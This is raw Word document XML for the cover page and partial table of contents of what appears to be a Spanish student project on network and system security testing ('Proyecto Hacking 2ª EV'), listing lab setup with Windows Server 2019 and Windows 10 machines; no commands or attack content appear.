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3486939"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="14F98A9E" w14:textId="41A8BB1A" w:rsidR="002D4392" w:rsidRDefault="002D4392"/>
        <w:p w14:paraId="7027A651" w14:textId="2F7F4C8E" w:rsidR="002D4392" w:rsidRDefault="002D4392">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="182880" distR="182880" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0580480B" wp14:editId="2558860B">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46856" w14:textId="7EED5FC0" w:rsidR="002D4392"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2D4392">
                                      <w:rPr>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>Proyecto Hacking 2ª EV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BC38F45" w14:textId="76AC7CC1" w:rsidR="002D4392" w:rsidRDefault="007E09C7">
                                    <w:pPr>
                                      <w:pStyle w:val="Sinespaciado"/>
                                      <w:spacing w:before="40" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Análisis de seguridad en redes y sistema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85C36B6" w14:textId="6185BA0B" w:rsidR="002D4392" w:rsidRDefault="002D4392">
                                    <w:pPr>
                                      <w:pStyle w:val="Sinespaciado"/>
                                      <w:spacing w:before="80" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                      <w:t>ALESANDER Martinez Seij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580480B" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Cuadro de texto 32" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:369pt;height:529.2pt;z-index:2517073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C246856" w14:textId="7EED5FC0" w:rsidR="002D4392"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2D4392">
                                <w:rPr>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Proyecto Hacking 2ª EV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BC38F45" w14:textId="76AC7CC1" w:rsidR="002D4392" w:rsidRDefault="007E09C7">
                              <w:pPr>
                                <w:pStyle w:val="Sinespaciado"/>
                                <w:spacing w:before="40" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Análisis de seguridad en redes y sistema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85C36B6" w14:textId="6185BA0B" w:rsidR="002D4392" w:rsidRDefault="002D4392">
                              <w:pPr>
                                <w:pStyle w:val="Sinespaciado"/>
                                <w:spacing w:before="80" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                                <w:t>ALESANDER Martinez Seij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06368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="501B28BD" wp14:editId="3CF6C53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4DD0D8A9" w14:textId="0F63FCA6" w:rsidR="002D4392" w:rsidRDefault="002D4392">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1B28BD" id="Rectángulo 33" o:spid="_x0000_s1027" style="position:absolute;margin-left:-4.4pt;margin-top:0;width:46.8pt;height:77.75pt;z-index:2517063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4DD0D8A9" w14:textId="0F63FCA6" w:rsidR="002D4392" w:rsidRDefault="002D4392">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131943472"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="28D49643" w14:textId="1ED1C2B7" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
          </w:pPr>
          <w:r>
            <w:t>Contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="15695FDC" w14:textId="762EA1D4" w:rsidR="00B66FE7" w:rsidRDefault="00D25CEE">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35575958" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:bidi="es-ES"/>
              </w:rPr>
              <w:t>1.Instalación del contorno</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575958 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="068F3897" w14:textId="31205ACE" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575959" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows server 2019 v1809 Build 17763.737</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575959 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F7ABF23" w14:textId="43E8EBD3" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575960" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows 10 20H2</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575960 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63038A17" w14:textId="60D3AC61" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575961" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows server 2019 v1809 Build 17763.737 dos:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575961 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19D56F2C" w14:textId="1CF7A86D" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575962" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Configuraciones de las máquinas</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575962 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C16A428" w14:textId="233BD2FB" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575963" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuración Windows 10:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575963 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BA45CB5" w14:textId="024F7F63" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575964" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuracion Windows server 2019:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575964 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B858536" w14:textId="0F56B480" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575965" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuración Global de las dos máquinas:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575965 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C545363" w14:textId="78CA78E1" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575966" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>d)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuración Windows Sever DC02:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575966 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A0FF706" w14:textId="6778EC62" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575967" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Documentación</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575967 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="618476F9" w14:textId="56075353" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575968" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introducción</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575968 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31D50779" w14:textId="09D43FED" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575969" w:history="1">
